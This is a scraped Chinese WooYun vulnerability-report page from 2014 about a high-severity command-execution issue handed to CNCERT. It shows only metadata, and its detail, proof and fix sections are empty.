公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-077249"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：北京方便面

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源北京方便面@乌云